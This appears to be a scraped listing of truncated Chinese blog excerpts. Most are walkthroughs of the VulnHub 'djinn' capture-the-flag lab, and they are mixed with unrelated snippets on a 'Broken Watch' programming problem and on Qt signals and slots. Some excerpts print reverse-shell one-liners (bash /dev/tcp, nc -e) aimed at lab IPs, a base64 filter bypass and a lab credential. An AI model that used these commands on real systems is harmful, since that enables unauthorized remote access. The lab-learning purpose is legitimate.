靶机下载链接: https://download.vulnhub.com/djinn/djinn.ova 主机端口扫描: FTP发现一些文件提示 1337端口是一个游戏,去看下 哈哈有点难,暂时放弃,看看7331HTTP server 这边有么有发现 使用dirb dirsearch 自带字典没有发现,加大字段枚举下目录 命令执行 反弹shell bash -i >& /dev/tcp/10.10.202.142/1234 0>&1一直弹不出来,猜测特殊字符做了过滤 base6…

这道题挺难的,和Djinn:1相比,正如作者所言,有许多相似的地方.仍然开放着端口 可以看到5个端口开放着,1337是web端口,这里面如djinn1一样,write your wish,但是send to god. 所以在7331端口下进行dirb:如下结果: 知道这些信息当然是下载source了,下载后文件如下(只粘贴关键部分) 作者告诉我这个请求是关键,说这里可以顺利的利用RCE,刚开始的我傻傻的还以为是改脚本运行连接服务器呢,可是尝试了很久都无法连接.有位大神给了我些许的灵感,就开始了R…

仅供个人娱乐 靶机信息 https://download.vulnhub.com/djinn/djinn.ova 一.主机探测 二.漏洞的查找和利用 21端口ftp 匿名登录 7331端口 命令执行  反弹窗口 nc -e /bin/bash 192.168.174.129 4444 尝试绕过 bash -i >& /dev/tcp/192.168.174.129/4444 0>&1 YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzNi4xMjk…

djinn:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/djinn-1,397/ 信息收集 首先我们嘚确保一点,kali机和靶机处于同一网段,查看kali ip地址 当打开这台靶机的时候我们就知道ip地址 由于我们已经确定了靶机的ip所以我们直接扫描开放端口 nmap -A -p- 192.168.20.145 首先我们去访问一下21端口的ftp服务,发现可以匿名登录.根目录有三个txt文本文件我们依次打开查看 creds.txt nitu:81299…

靶机准备 将靶机ova文件导入虚拟机,并将网络设置为NAT 开机获得ip:192.168.164.188 kali:192.168.164.137 渗透测试 扫描端口 nmap -sS -sV -T5 -A -p- 192.168.164.188 开放了4个端口,其中7331运行着http服务,访问 爆下目录 ./dirsearch.py -u http://192.168.164.188:7331 -e* -w top.txt 扫到两个目录 浏览器访问http://192.168.164.18…

A. Numbers Unsolved. B. Broken Watch Solved. 题意: 一个圆盘上,有等分的n块区域,有三根指针,当三根指针分别位于两块区域的交界处时 指针的三点相连会形成一个三角形,求有多少个三角包含三指针的起点(即交汇处) 思路: #include<bits/stdc++.h> using namespace std; typedef unsigned long long ull; typedef long long ll; ll A, B, C, n; int…

B:Broken Watch (别问,问就是队友写的) 代码: import java.awt.List; import java.io.BufferedInputStream; import java.io.File; import java.io.FileInputStream; import java.io.InputStream; import java.math.BigDecimal; import java.math.BigInteger; import java.sql.Time;…

About djinn: 1 描述 难度级别:中等 Flag:user.txt和root.txt 说明:该计算机是VirtualBox以及VMWare兼容的.DHCP将自动分配IP.您将在登录屏幕上看到该IP地址.您必须找到并读取分别在user.txt和root.txt中存在的两个Flag(user和root) 格式:虚拟机(Virtualbox-OVA) 操作系统:Linux 屏幕截图 下载地址 djinn.ova (Size: 1.9 GB) Download: https://drive.…

摘要 信号槽是 Qt 框架引以为豪的机制之一.所谓信号槽,实际就是观察者模式.当某个事件发生之后,比如,按钮检测到自己被点击了一下,它就会发出一个信号 (signal).这种发出是没有目的的,类似广播.如果有对象对这个信号感兴趣, 它就会使用连接(connect)函数,意思是,将想要处理的信号和自己的一个函 数(称为槽(slot))绑定来处理这个信号.也就是说,当信号发出时,被连接 的槽函数会自动被回调.这就类似观察者模式:当发生了感兴趣的事件,某一个 操作就会被自动触发.(这里提一句,Qt 的…